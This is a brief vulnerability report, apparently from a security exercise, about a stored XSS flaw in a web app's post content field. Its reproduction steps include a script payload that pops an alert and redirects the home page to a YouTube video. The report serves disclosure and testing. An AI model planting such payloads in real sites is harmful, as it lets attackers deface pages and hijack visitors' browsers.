# Vulnerability 2: Stored XSS in create/edit post form allows for page defacing

- Vulnerability: Stored XSS
- Where: `content` field
- Impact: Allows to change the home page

## Steps to reproduce

1. Register a user
2. Create a new **Public** Post
3. Insert `<script>alert(\\\No posts available, and not going to be more :P\\\");location.href=\\\"https://www.youtube.com/watch?v=MlW7T0SUH0E&autoplay=1\\\";</script>`
4. Go to home page

[(POC)](vuln2.py)
